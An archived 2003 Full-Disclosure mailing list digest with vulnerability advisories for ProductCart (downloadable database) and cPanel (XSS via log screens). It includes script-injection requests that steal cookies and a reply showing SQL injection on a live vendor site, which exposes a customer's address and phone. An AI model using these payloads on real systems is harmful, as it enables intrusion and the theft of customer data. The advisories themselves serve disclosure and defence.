Full Disclosure mailing list archives
Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs
From: security snot <booger () unixclan net>
Date: Sun, 6 Jul 2003 11:31:21 -0700 (PDT)
Guys - Could we please limit the length of included replies on this list, to something sane? Quoting the entire thread is very annoying. Thanks. ----------------------------------------------------------- "Whitehat by day, booger at night - I'm the security snot." - CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ - ----------------------------------------------------------- On Sun, 6 Jul 2003, Markus Nielsen wrote:
On Sun, 2003-07-06 at 16:00, full-disclosure-request () lists netsys com wrote:Send Full-Disclosure mailing list submissions to full-disclosure () lists netsys com To subscribe or unsubscribe via the World Wide Web, visit http://lists.netsys.com/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists netsys com You can reach the person managing the list at full-disclosure-admin () lists netsys com When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Today's Topics: 1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh) 2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff) 3. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (KF) 4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood) 5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) 6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) 7. Re: tripbid secure codes (Dave Korn) 8. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (Larry W. Cashdollar) 9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen) --__--__-- Message: 1 From: "Tri Huynh" <trihuynh () zeeup com> To: <bugtraq () securityfocus com> Cc: <full-disclosure () lists netsys com> Date: Sat, 5 Jul 2003 13:07:51 -0700 Subject: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely This is a multi-part message in MIME format. ------=_NextPart_000_0053_01C342F6.70CDCF30 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ProductCart database file can be downloaded remotely =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D PROGRAM: ProductCart HOMEPAGE: http://www.earlyimpact.com/productcart/ VULNERABLE VERSIONS: 1.0 to 2.0 RISK: High DESCRIPTION =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D ProductCart=AE is an ASP shopping cart that combines sophisticated=20 ecommerce features with time-saving store management tools and = remarkable=20 ease of use. It is widely used by many e-commerce sites. DETAILS =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D In the default installation, product cart database file is located at=20 /productcart/database/EIPC.mdb which can be accessed easily by any remote attackers. Sample: http://victimhost/productcart/database/EIPC.mdb The database file includes the store administration password as well as=20 customer's info (including credit card info).=20 =20 WORKAROUND =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Rename the database file, put it in a protected directory. CREDITS =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Discovered by Tri Huynh from Sentry Union DISLAIMER =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. FEEDBACK =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Please send suggestions, updates, and comments to: trihuynh () zeeup com ------=_NextPart_000_0053_01C342F6.70CDCF30 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><!--StartFragment -->ProductCart = database file can=20 be downloaded=20 remotely<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D<BR><BR>PROGRAM:=20 ProductCart</FONT></DIV> <DIV><FONT face=3DArial size=3D2>HOMEPAGE: <A=20 href=3D"http://www.earlyimpact.com/productcart/">http://www.earlyimpact.c= om/productcart/</A><BR>VULNERABLE=20 VERSIONS: 1.0 to 2.0</FONT></DIV> <DIV><FONT face=3DArial size=3D2>RISK: High</FONT></DIV><FONT = face=3DArial size=3D2> <DIV><BR> </DIV> <DIV>DESCRIPTION<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D<BR><BR><!--StartFragment -->ProductCart=AE=20 is an ASP shopping cart that combines sophisticated </DIV> <DIV>ecommerce features with time-saving store management tools and = remarkable </DIV> <DIV>ease of use. It is widely used by many e-commerce=20 sites.<BR><BR>DETAILS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>In=20 the default installation, product cart database file is located at = </DIV> <DIV>/productcart/database/EIPC.mdb which can be accessed easily</DIV> <DIV>by any remote attackers.</DIV> <DIV> </DIV> <DIV>Sample: <A=20 href=3D"http://victimhost/productcart/database/EIPC.mdb">http://victimhos= t/productcart/database/EIPC.mdb</A></DIV> <DIV> </DIV> <DIV>The database file includes the store administration password as = well as=20 </DIV> <DIV>customer's info (including credit card info). </DIV> <DIV> <BR><BR>=20 WORKAROUND<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D<BR><BR>Rename=20 the database file, put it in a protected=20 directory.<BR><BR><BR>CREDITS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Discovered=20 by Tri Huynh from Sentry Union</DIV> <DIV><BR><BR>DISLAIMER<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>The=20 information within this paper may change without notice. Use of<BR>this=20 information constitutes acceptance for use in an AS IS = condition.<BR>There are=20 NO warranties with regard to this information. In no event<BR>shall the = author=20 be liable for any damages whatsoever arising out of<BR>or in connection = with the=20 use or spread of this information. Any use<BR>of this information is at = the=20 user's own=20 risk.<BR><BR><BR>FEEDBACK<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Please=20 send suggestions, updates, and comments to: <A=20 href=3D"mailto:trihuynh () zeeup com">trihuynh () zeeup com</A><BR><BR><BR><BR>= </DIV></FONT></BODY></HTML> ------=_NextPart_000_0053_01C342F6.70CDCF30-- --__--__-- Message: 2 From: gyrniff <b240503 () gyrniff dk> To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely Date: Sat, 5 Jul 2003 19:37:41 +0200 URL: http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 Change the name Paul to Paul' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 have a nice weekend ;-) On Saturday 05 July 2003 22:07, Tri Huynh wrote:ProductCart database file can be downloaded remotely ================================================= PROGRAM: ProductCart HOMEPAGE: http://www.earlyimpact.com/productcart/ VULNERABLE VERSIONS: 1.0 to 2.0 RISK: High DESCRIPTION ================================================= ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites. DETAILS ================================================= In the default installation, product cart database file is located at /productcart/database/EIPC.mdb which can be accessed easily by any remote attackers. Sample: http://victimhost/productcart/database/EIPC.mdb The database file includes the store administration password as well as customer's info (including credit card info). WORKAROUND ================================================= Rename the database file, put it in a protected directory. CREDITS ================================================= Discovered by Tri Huynh from Sentry Union DISLAIMER ================================================= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. FEEDBACK ================================================= Please send suggestions, updates, and comments to: trihuynh () zeeup com--__--__-- Message: 3 Date: Sat, 05 Jul 2003 15:30:28 -0400 From: KF <dotslash () snosoft com> To: gyrniff <b240503 () gyrniff dk> CC: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely Was that legit California data? I am sure than making someone have a nice weekend you just made multiple someones have a shitty month ahead of them... http://www.theregister.co.uk/content/55/31509.html -KF gyrniff wrote:URL: http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 Change the name Paul to Paul' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 have a nice weekend ;-) On Saturday 05 July 2003 22:07, Tri Huynh wrote:ProductCart database file can be downloaded remotely ================================================= PROGRAM: ProductCart HOMEPAGE: http://www.earlyimpact.com/productcart/ VULNERABLE VERSIONS: 1.0 to 2.0 RISK: High DESCRIPTION ================================================= ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites. DETAILS ================================================= In the default installation, product cart database file is located at /productcart/database/EIPC.mdb which can be accessed easily by any remote attackers. Sample: http://victimhost/productcart/database/EIPC.mdb The database file includes the store administration password as well as customer's info (including credit card info). WORKAROUND ================================================= Rename the database file, put it in a protected directory. CREDITS ================================================= Discovered by Tri Huynh from Sentry Union DISLAIMER ================================================= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. FEEDBACK ================================================= Please send suggestions, updates, and comments to: trihuynh () zeeup com_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- Message: 4 From: "morning_wood" <se_cur_ity () hotmail com> To: "gyrniff" <b240503 () gyrniff dk>, <full-disclosure () lists netsys com> Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely Date: Sat, 5 Jul 2003 15:24:46 -0700 vuln to XSS too.. http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp ----- Original Message ----- From: "gyrniff" <b240503 () gyrniff dk> To: <full-disclosure () lists netsys com> Sent: Saturday, July 05, 2003 10:37 AM Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotelyURL:http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239Change the name Paul to Paul' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missingoperator) inquery expression ''Paul'',lastName='Smith',customerCompany='EarlyImpact',address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHEREidCustomer=115'./productcart/build_to_order/productcart/pcadmin/processOrder.asp,line 36have a nice weekend ;-) On Saturday 05 July 2003 22:07, Tri Huynh wrote:ProductCart database file can be downloaded remotely ================================================= PROGRAM: ProductCart HOMEPAGE: http://www.earlyimpact.com/productcart/ VULNERABLE VERSIONS: 1.0 to 2.0 RISK: High DESCRIPTION ================================================= ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools andremarkableease of use. It is widely used by many e-commerce sites. DETAILS ================================================= In the default installation, product cart database file is locatedat/productcart/database/EIPC.mdb which can be accessed easily by any remote attackers. Sample: http://victimhost/productcart/database/EIPC.mdb The database file includes the store administration password aswell ascustomer's info (including credit card info). WORKAROUND ================================================= Rename the database file, put it in a protected directory. CREDITS ================================================= Discovered by Tri Huynh from Sentry Union DISLAIMER ================================================= The information within this paper may change without notice. Useofthis information constitutes acceptance for use in an AS IScondition.There are NO warranties with regard to this information. In noeventshall the author be liable for any damages whatsoever arising outofor in connection with the use or spread of this information. Anyuseof this information is at the user's own risk. FEEDBACK ================================================= Please send suggestions, updates, and comments to:trihuynh () zeeup com_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- Message: 5 From: Ory Segal <ORY.SEGAL () SANCTUMINC COM> To: "BugTraq (E-mail)" <BUGTRAQ () SECURITYFOCUS COM>, "Full Disclosure (E-mail)" <full-disclosure () lists netsys com>, "WebAppSec (E-mail)" <webappsec () SECURITYFOCUS COM> Date: Sun, 6 Jul 2003 01:39:33 -0700 Subject: [Full-disclosure] cPanel Malicious HTML Tags Injection Vulnerability This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C3439A.1FBE84F0 Content-Type: text/plain; charset="iso-8859-1" //////////////////////////////////////////////////////////////////////////// /// //==========================>> Security Advisory <<==========================// //////////////////////////////////////////////////////////////////////////// /// ---------------------------------------------------------------------------- --- -----[ cPanel Malicious HTML Tags Injection Vulnerability ---------------------------------------------------------------------------- --- --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com --[ Discovery Date: 06/17/2003 (Vendor was notified) --[ Release Date: 07/06/2003 --[ Product: Tested on cPanel 6.4.2-STABLE --[ Severity: Medium --[ CVE: Not assigned yet --[ Summary From the vendor's web site: "...The Cpanel interface is a client side interface, which allows your customers to easily control a web hosting account. With the touch of a button, they can add e-mail accounts, access their files, backup their files, setup a shopping cart, and more..." Web users can embed Malicious HTML tags in HTTP requests, which will later be parsed by the web site administrator's browser, in several cPanel screens. This may lead to theft of cookies associated with the domain, or execution of client-side scripts in the administrator's browser. --[ Description The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web site administrator with HTTP request logs. These scripts do not sanitize the URL part of HTTP requests and present them to the administrator as is, thus, allowing an attacker to embed malicious HTML tags that will later be parsed and executed by the administrators browser. For example, lets take a look at the 'Error Log' screen: [From errlog.html] ... <b>Last 300 Error Log Messages in reverse order:</b><hr> <pre> [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/foobar.html </pre> ... The following request will present a pop-up screen with the cookies that are currently associated with the domain: GET /<script>alert(document.cookie);</script> HTTP/1.0 Host: www.site.com --[ Note The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the latest requests as HTML links, thus the malicious payload must terminate the <a> tag before opening a new one. For example: GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 Host: www.site.com --[ Solution According to the vendor, the problem was fixed in version 7.0, which can be downloaded at: http://www.cpanel.net/downloads.htm Ory Segal Senior Security Engineer Sanctum, Inc. http://www.SanctumInc.Com/ Ampa Bldg., 1 Sapir Street. Mail: P.O.Box 12047 Herzliya 46733, ISRAEL Tel: +972-9-9586077 Ext. 236 Fax: +972-9-9576337 ------_=_NextPart_001_01C3439A.1FBE84F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Diso-8859-1"> <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version = 5.5.2653.12"> <TITLE>cPanel Malicious HTML Tags Injection Vulnerability</TITLE> </HEAD> <BODY> <P><FONT = SIZE=3D2>///////////////////////////////////////////////////////////////= ////////////////</FONT> <BR><FONT = SIZE=3D2>//=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D>> Security Advisory = <<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D//</FONT> <BR><FONT = SIZE=3D2>///////////////////////////////////////////////////////////////= ////////////////</FONT> </P> <P><FONT = SIZE=3D2>---------------------------------------------------------------= ----------------</FONT> <BR><FONT SIZE=3D2>-----[ cPanel Malicious HTML Tags Injection = Vulnerability</FONT> <BR><FONT = SIZE=3D2>---------------------------------------------------------------= ----------------</FONT> </P> <P><FONT SIZE=3D2>--[ Author: Ory Segal, Sanctum inc. <A = HREF=3D"http://www.SanctumInc.com" = TARGET=3D"_blank">http://www.SanctumInc.com</A></FONT> <BR><FONT SIZE=3D2>--[ Discovery Date: 06/17/2003 (Vendor was = notified)</FONT> <BR><FONT SIZE=3D2>--[ Release Date: 07/06/2003 </FONT> <BR><FONT SIZE=3D2>--[ Product: Tested on cPanel 6.4.2-STABLE</FONT> <BR><FONT SIZE=3D2>--[ Severity: Medium</FONT> <BR><FONT SIZE=3D2>--[ CVE: Not assigned yet</FONT> </P> <P><FONT SIZE=3D2>--[ Summary</FONT> </P> <P><FONT SIZE=3D2>From the vendor's web site:</FONT> <BR><FONT SIZE=3D2>"...The Cpanel interface is a client side = interface, which allows your customers </FONT> <BR><FONT SIZE=3D2>to easily control a web hosting account. With the = touch of a button, they can </FONT> <BR><FONT SIZE=3D2>add e-mail accounts, access their files, backup = their files, setup a shopping </FONT> <BR><FONT SIZE=3D2>cart, and more..."</FONT> </P> <P><FONT SIZE=3D2>Web users can embed Malicious HTML tags in HTTP = requests, which will later </FONT> <BR><FONT SIZE=3D2>be parsed by the web site administrator's browser, = in several cPanel screens. </FONT> <BR><FONT SIZE=3D2>This may lead to theft of cookies associated with = the domain, or execution of </FONT> <BR><FONT SIZE=3D2>client-side scripts in the administrator's = browser.</FONT> <BR><FONT SIZE=3D2> </FONT> <BR><FONT SIZE=3D2>--[ Description</FONT> </P> <P><FONT SIZE=3D2>The 'Error Log' and 'Latest Visitors' screens in = cPanel, provide the web site </FONT> <BR><FONT SIZE=3D2>administrator with HTTP request logs. These scripts = do not sanitize the URL part </FONT> <BR><FONT SIZE=3D2>of HTTP requests and present them to the = administrator as is, thus, allowing an </FONT> <BR><FONT SIZE=3D2>attacker to embed malicious HTML tags that will = later be parsed and executed by </FONT> <BR><FONT SIZE=3D2>the administrators browser.</FONT> </P> <P><FONT SIZE=3D2>For example, lets take a look at the 'Error Log' = screen:</FONT> </P> <P><FONT SIZE=3D2>[From errlog.html]</FONT> <BR><FONT SIZE=3D2>...</FONT> <BR><FONT SIZE=3D2><b>Last 300 Error Log Messages in reverse = order:</b><hr></FONT> <BR><FONT SIZE=3D2><pre></FONT> <BR><FONT SIZE=3D2>[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] = File does not exist: </FONT> <BR><FONT SIZE=3D2>/home/dir/public_html/foobar.html</FONT> <BR><FONT SIZE=3D2></pre></FONT> <BR><FONT SIZE=3D2>...</FONT> </P> <P><FONT SIZE=3D2>The following request will present a pop-up screen = with the cookies </FONT> <BR><FONT SIZE=3D2>that are currently associated with the = domain:</FONT> </P> <P><FONT SIZE=3D2> GET = /<script>alert(document.cookie);</script> HTTP/1.0</FONT> <BR><FONT SIZE=3D2> Host: www.site.com</FONT> </P> <BR> <P><FONT SIZE=3D2>--[ Note</FONT> </P> <P><FONT SIZE=3D2>The 'Latest Visitors' screen of the tested version = (6.4.2-STABLE) presented the </FONT> <BR><FONT SIZE=3D2>latest requests as HTML links, thus the malicious = payload must terminate the <a> </FONT> <BR><FONT SIZE=3D2>tag before opening a new one. For example:</FONT> </P> <P><FONT SIZE=3D2> GET = /"></a><script>alert(document.cookie);</script>= ; HTTP/1.0</FONT> <BR><FONT SIZE=3D2> Host: www.site.com</FONT> </P> <P><FONT SIZE=3D2>--[ Solution</FONT> </P> <P><FONT SIZE=3D2>According to the vendor, the problem was fixed in = version 7.0, which can be </FONT> <BR><FONT SIZE=3D2>downloaded at: <A = HREF=3D"http://www.cpanel.net/downloads.htm" = TARGET=3D"_blank">http://www.cpanel.net/downloads.htm</A></FONT> </P> <BR> <BR> <BR> <P><FONT = SIZE=3D2> Ory = Segal</FONT> <BR><FONT SIZE=3D2> Senior Security Engineer</FONT> <BR><FONT SIZE=3D2> Sanctum, = Inc.</FONT> <BR><FONT SIZE=3D2> <A HREF=3D"http://www.SanctumInc.Com/" = TARGET=3D"_blank">http://www.SanctumInc.Com/</A></FONT> </P> <P><FONT SIZE=3D2>Ampa Bldg., 1 Sapir Street.</FONT> <BR><FONT SIZE=3D2>Mail: = P.O.Box 12047</FONT> <BR><FONT SIZE=3D2>Herzliya 46733, = ISRAEL</FONT> </P> <P><FONT SIZE=3D2>Tel: +972-9-9586077 Ext. 236</FONT> <BR><FONT SIZE=3D2>Fax: +972-9-9576337</FONT> </P> </BODY> </HTML> ------_=_NextPart_001_01C3439A.1FBE84F0-- --__--__-- Message: 6 Date: Sun, 06 Jul 2003 11:46:44 +0300 From: Ory Segal <ory.segal () sanctuminc com> To: BUGTRAQ () SECURITYFOCUS COM, full-disclosure () lists netsys com, webappsec () SECURITYFOCUS COM Subject: [Full-disclosure] cPanel Malicious HTML Tags Injection Vulnerability ------------------------------------------------------------------------------- -----[ cPanel Malicious HTML Tags Injection Vulnerability ------------------------------------------------------------------------------- --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com --[ Discovery Date: 06/17/2003 (Vendor was notified) --[ Release Date: 07/06/2003 --[ Product: Tested on cPanel 6.4.2-STABLE --[ Severity: Medium --[ CVE: Not assigned yet --[ Summary From the vendor's web site: "...The Cpanel interface is a client side interface, which allows your customers to easily control a web hosting account. With the touch of a button, they can add e-mail accounts, access their files, backup their files, setup a shopping cart, and more..." Web users can embed Malicious HTML tags in HTTP requests, which will later be parsed by the web site administrator's browser, in several cPanel screens. This may lead to theft of cookies associated with the domain, or execution of client-side scripts in the administrator's browser. --[ Description The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web site administrator with HTTP request logs. These scripts do not sanitize the URL part of HTTP requests and present them to the administrator as is, thus, allowing an attacker to embed malicious HTML tags that will later be parsed and executed by the administrators browser. For example, lets take a look at the 'Error Log' screen: [From errlog.html] ... <b>Last 300 Error Log Messages in reverse order:</b><hr> <pre> [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/foobar.html </pre> ... The following request will present a pop-up screen with the cookies that are currently associated with the domain: GET /<script>alert(document.cookie);</script> HTTP/1.0 Host: www.site.com --[ Note The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the latest requests as HTML links, thus the malicious payload must terminate the <a> tag before opening a new one. For example: GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 Host: www.site.com --[ Solution According to the vendor, the problem was fixed in version 7.0, which can be downloaded at: http://www.cpanel.net/downloads.htm --__--__-- Message: 7 From: "Dave Korn" <davek_throwaway () hotmail com> To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] tripbid secure codes Date: Sun, 06 Jul 2003 12:23:01 +0000 ----- Original Message ----- From: <auto94042 () hushmail com> To: <full-disclosure () lists netsys com> Sent: Friday, June 27, 2003 6:25 AM Subject: [Full-disclosure] tripbid secure codesi post the thing to the vuln dev some days ago and get quite a bigrespnose.not only do i get a heart 2 heat with n1xo reiman about portmon ! but some folks want me to look at the code they make, specially a 'hello- world.c' progie -> " holo, can you check my hello-world.c for strcpy ?? securecode do the trick " <- paraphase the msg, i rm -rf / it since it make me anger and stress it ! i am willing to try the secure code since the grep 'strcpy' is losing his thrills so i trick around with : [user@localhost]$ ./securecode -s hello-world.cNever ever EVER run an insecure program over arbitrary data you receive from the net without checking it for safety first..... Let's look at this hello-world.c before we run anything on it.... Z:\sploits-misc\targzip>type hello-world.c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!? ?!? ?!? ?!? ?!? ?!? ?!? 